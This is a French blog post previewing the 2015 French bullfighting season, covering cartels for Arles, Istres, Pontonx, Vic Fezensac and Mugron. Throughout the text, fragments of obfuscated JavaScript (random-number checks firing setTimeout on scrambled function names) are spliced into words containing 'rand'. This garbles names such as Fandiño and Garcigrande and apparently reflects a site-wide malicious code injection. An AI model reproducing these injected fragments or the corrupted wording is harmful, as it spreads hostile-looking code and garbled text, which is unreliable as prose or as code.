LA TEMPORADA FRANÇAISE SE DESSINE

On connaît déjà les cartels de certaines ferias et ceux de petites arènes dans les sud ouest et le sud est. Arles a concocté une feria 2015 sans doute plus intéressante que celles de ces dernières années. Un peu plus d’alchimie, de luxe, de nouveautés. Le cartel d’ouverture, à part la présence de Frascuelo, avec un certain cartel après ses prestations dans le sud est en 2014, a surtout l’intérêt de revoir Curro Diaz et aussi Roman Pérez ailleurs que dans de petites arènes. Retour déterminant pour le fer français de Dos Hermanas en corrida. Il y a une belle affiche avec Finito, Bautista et Manzanares, mais pour l’aficionado la corrida la plus intéressante pourrait être la confrontation entre Castella, Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño et Luque devant des Montalvo. La corrida du lundi attire surtout pour la présence des Baltasar Ibán, notons toutefois que la corrida de rejon sans Pablo Hermoso, ni Diego Ventura perd un peu de son aura. Ces arguments de la feria seront-ils suffisants pour convaincre le grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and public, en tenant compte de l’absence, une nouvelle fois, de ténors de la tauromachie, comme Morante, Ponce, El Juli, Perera, Talavante plus les deux figuras les plus importantes à cheval.

Istres a de nouveau interpellé l’aficion, même en dehors de la France, avec des cartels dignes de Nîmes. Le mano a mano Morante et El Juli devant des Garcigrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande, est un cartelazo, tout comme cette corrida avec Ponce, Manzanares et Talavante. Espérons que la présentation des toros de Zalduendo, dont on n’attend pas qu’ils sortent comme à Bilbao, soit correcte. Autre temps fort pourrait être cet autre mano a mano entre Jean Baptiste et Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño devant des Victorino. En somme, sur le papier, de grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands en perspective concoctés par Bernard Marsella.

Dans le Sud Ouest on attend l’inauguration pour cette fin de mois des arènes de Pontonx où Juan Leal organise un Bolsin plus un festival le premier mars où on aura le plaisir de le retrouver avec Pepe Luis Vázquez, El Fundi et Juan Mora entre autres. Ça a de la saveur et rappellera  à certains de beaux souvenirs. On connaît aussi les cartels de Vic Fezenzac, une feria classique, sans grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes surprises, dont on se demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande parfois quelle pourrait être l’alchimie entre les toreros programmés et certains élevages, et dont le temps fort pourrait être la corrida de Escolar Gil pour l’inévitable Robleño, avec la présence d’Alberto Aguilar et le retour, enfin, de Sergio Aguilar en France.

Notons également le XXX anniversaire de la novillada de Mugron, toujours organisée avec beaucoup d’intelligence, de soin, en définitive d’aficion. Novillos de Baltasar Ibán pour Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Marcos, Louis Husson et Leo Valadez qui se présente en piquée.

Les commentaires sont fermés.